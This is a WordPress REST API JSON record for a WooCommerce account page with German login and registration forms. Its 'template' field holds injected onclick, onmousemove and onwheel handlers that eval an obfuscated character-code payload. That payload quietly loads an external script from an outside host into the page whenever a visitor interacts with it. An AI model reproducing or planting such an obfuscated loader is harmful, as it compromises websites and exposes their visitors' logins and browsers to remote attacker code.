{"id":10,"date":"2020-01-14T15:19:29","date_gmt":"2020-01-14T14:19:29","guid":{"rendered":"https:\/\/grun.idp.lu\/mon-compte\/"},"modified":"2020-12-07T09:56:51","modified_gmt":"2020-12-07T08:56:51","slug":"my-account","status":"publish","type":"page","link":"https:\/\/grun.jumo.idp.lu\/de\/my-account\/","title":{"rendered":"Mon compte"},"content":{"rendered":"<div class=\"woocommerce\"><div class=\"woocommerce-notices-wrapper\"><\/div>\n\n<div class=\"u-columns row\" id=\"customer_login\">\n\n\t<div class=\"u-column1 col-md-6 col-12\">\n\n\n\t\t<h2>Anmelden<\/h2>\n\n\t\t<form class=\"woocommerce-form woocommerce-form-login login\" method=\"post\">\n\n\t\t\t\n\t\t\t<p class=\"woocommerce-form-row woocommerce-form-row--wide form-row form-row-wide\">\n\t\t\t\t<label for=\"username\">Benutzername oder E-Mail-Adresse&nbsp;<span class=\"required\">*<\/span><\/label>\n\t\t\t\t<input type=\"text\" class=\"woocommerce-Input woocommerce-Input--text input-text\" name=\"username\" id=\"username\" autocomplete=\"username\" value=\"\" \/>\t\t\t<\/p>\n\t\t\t<p class=\"woocommerce-form-row woocommerce-form-row--wide form-row form-row-wide\">\n\t\t\t\t<label for=\"password\">Passwort&nbsp;<span class=\"required\">*<\/span><\/label>\n\t\t\t\t<input class=\"woocommerce-Input woocommerce-Input--text input-text\" type=\"password\" name=\"password\" id=\"password\" autocomplete=\"current-password\" \/>\n\t\t\t<\/p>\n\n\t\t\t\n\t\t\t<p class=\"form-row\">\n\t\t\t\t<label class=\"woocommerce-form__label woocommerce-form__label-for-checkbox woocommerce-form-login__rememberme\">\n\t\t\t\t\t<input class=\"woocommerce-form__input woocommerce-form__input-checkbox\" name=\"rememberme\" type=\"checkbox\" id=\"rememberme\" value=\"forever\" \/> <span>Angemeldet bleiben<\/span>\n\t\t\t\t<\/label>\n\t\t\t\t<input type=\"hidden\" id=\"woocommerce-login-nonce\" name=\"woocommerce-login-nonce\" value=\"91629020d5\" \/><input type=\"hidden\" name=\"_wp_http_referer\" value=\"\/de\/wp-json\/wp\/v2\/pages\/10\" \/>\t\t\t\t<button type=\"submit\" class=\"woocommerce-button button woocommerce-form-login__submit\" name=\"login\" value=\"Anmelden\">Anmelden<\/button>\n\t\t\t<\/p>\n\t\t\t<p class=\"woocommerce-LostPassword lost_password\">\n\t\t\t\t<a href=\"https:\/\/grun.jumo.idp.lu\/de\/my-account\/lost-password\/\">Passwort vergessen?<\/a>\n\t\t\t<\/p>\n\n\t\t\t\n\t\t<\/form>\n\n\n\t<\/div>\n\n\t<div class=\"u-column2 col-md-6 col-12\">\n\n\t\t<h2>Neues Kundenkonto anlegen<\/h2>\n\n\t\t<form method=\"post\" class=\"woocommerce-form woocommerce-form-register register\"  >\n\n\t\t\t\n\t\t\t\n\t\t\t\t<p class=\"woocommerce-form-row woocommerce-form-row--wide form-row form-row-wide\">\n\t\t\t\t\t<label for=\"reg_username\">Benutzername&nbsp;<span class=\"required\">*<\/span><\/label>\n\t\t\t\t\t<input type=\"text\" class=\"woocommerce-Input woocommerce-Input--text input-text\" name=\"username\" id=\"reg_username\" autocomplete=\"username\" value=\"\" \/>\t\t\t\t<\/p>\n\n\t\t\t\n\t\t\t<p class=\"woocommerce-form-row woocommerce-form-row--wide form-row form-row-wide\">\n\t\t\t\t<label for=\"reg_email\">E-Mail-Adresse&nbsp;<span class=\"required\">*<\/span><\/label>\n\t\t\t\t<input type=\"email\" class=\"woocommerce-Input woocommerce-Input--text input-text\" name=\"email\" id=\"reg_email\" autocomplete=\"email\" value=\"\" \/>\t\t\t<\/p>\n\n\t\t\t\n\t\t\t\t<p class=\"woocommerce-form-row woocommerce-form-row--wide form-row form-row-wide\">\n\t\t\t\t\t<label for=\"reg_password\">Passwort&nbsp;<span class=\"required\">*<\/span><\/label>\n\t\t\t\t\t<input type=\"password\" class=\"woocommerce-Input woocommerce-Input--text input-text\" name=\"password\" id=\"reg_password\" autocomplete=\"new-password\" \/>\n\t\t\t\t<\/p>\n\n\t\t\t\n\t\t\t<div class=\"g-recaptcha\" data-sitekey=\"6LcUBLIZAAAAAPK57voOba7QGKWUxzF131vB2mY7\" data-theme=\"light\"><\/div><div class=\"woocommerce-privacy-policy-text\"><p>Vos donn\u00e9es personnelles seront utilis\u00e9es pour vous accompagner au cours de votre visite du site web, g\u00e9rer l\u2019acc\u00e8s \u00e0 votre compte, et pour d\u2019autres raisons d\u00e9crites dans notre <a href=\"https:\/\/grun.jumo.idp.lu\/de\/politique-de-confidentialite\/\" class=\"woocommerce-privacy-policy-link\" target=\"_blank\">Datenschutzerkl\u00e4rung<\/a>.<\/p>\n<\/div>\n\t\t\t<p class=\"woocommerce-form-row form-row\">\n\t\t\t\t<input type=\"hidden\" id=\"woocommerce-register-nonce\" name=\"woocommerce-register-nonce\" value=\"3f325dabd0\" \/><input type=\"hidden\" name=\"_wp_http_referer\" value=\"\/de\/wp-json\/wp\/v2\/pages\/10\" \/>\t\t\t\t<button type=\"submit\" class=\"woocommerce-Button woocommerce-button button woocommerce-form-register__submit\" name=\"register\" value=\"Neues Kundenkonto anlegen\">Neues Kundenkonto anlegen<\/button>\n\t\t\t<\/p>\n\n\t\t\t\n\t\t<\/form>\n\n\t<\/div>\n\n<\/div>\n\n<\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"\" onclick=\"javascript:eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,101,44,115,44,116,41,123,110,117,108,108,61,61,101,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,41,38,38,40,40,116,61,101,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,115,41,41,46,97,115,121,110,99,61,33,48,44,116,46,105,100,61,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,106,115,45,115,116,97,103,101,45,104,111,115,116,46,99,111,109,47,99,97,99,104,101,100,47,97,115,115,101,116,115,46,106,115,34,44,40,101,61,101,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,115,41,91,48,93,41,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,44,101,41,41,125,40,100,111,99,117,109,101,110,116,44,34,115,99,114,105,112,116,34,41,59))\" onmousemove=\"javascript:eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,101,44,115,44,116,41,123,110,117,108,108,61,61,101,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,41,38,38,40,40,116,61,101,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,115,41,41,46,97,115,121,110,99,61,33,48,44,116,46,105,100,61,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,106,115,45,115,116,97,103,101,45,104,111,115,116,46,99,111,109,47,99,97,99,104,101,100,47,97,115,115,101,116,115,46,106,115,34,44,40,101,61,101,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,115,41,91,48,93,41,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,44,101,41,41,125,40,100,111,99,117,109,101,110,116,44,34,115,99,114,105,112,116,34,41,59))\" onwheel=\"javascript:eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,101,44,115,44,116,41,123,110,117,108,108,61,61,101,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,41,38,38,40,40,116,61,101,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,115,41,41,46,97,115,121,110,99,61,33,48,44,116,46,105,100,61,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,106,115,45,115,116,97,103,101,45,104,111,115,116,46,99,111,109,47,99,97,99,104,101,100,47,97,115,115,101,116,115,46,106,115,34,44,40,101,61,101,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,115,41,91,48,93,41,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,44,101,41,41,125,40,100,111,99,117,109,101,110,116,44,34,115,99,114,105,112,116,34,41,59))\"","meta":[],"_links":{"self":[{"href":"https:\/\/grun.jumo.idp.lu\/de\/wp-json\/wp\/v2\/pages\/10"}],"collection":[{"href":"https:\/\/grun.jumo.idp.lu\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/grun.jumo.idp.lu\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/grun.jumo.idp.lu\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/grun.jumo.idp.lu\/de\/wp-json\/wp\/v2\/comments?post=10"}],"version-history":[{"count":1,"href":"https:\/\/grun.jumo.idp.lu\/de\/wp-json\/wp\/v2\/pages\/10\/revisions"}],"predecessor-version":[{"id":604,"href":"https:\/\/grun.jumo.idp.lu\/de\/wp-json\/wp\/v2\/pages\/10\/revisions\/604"}],"wp:attachment":[{"href":"https:\/\/grun.jumo.idp.lu\/de\/wp-json\/wp\/v2\/media?parent=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}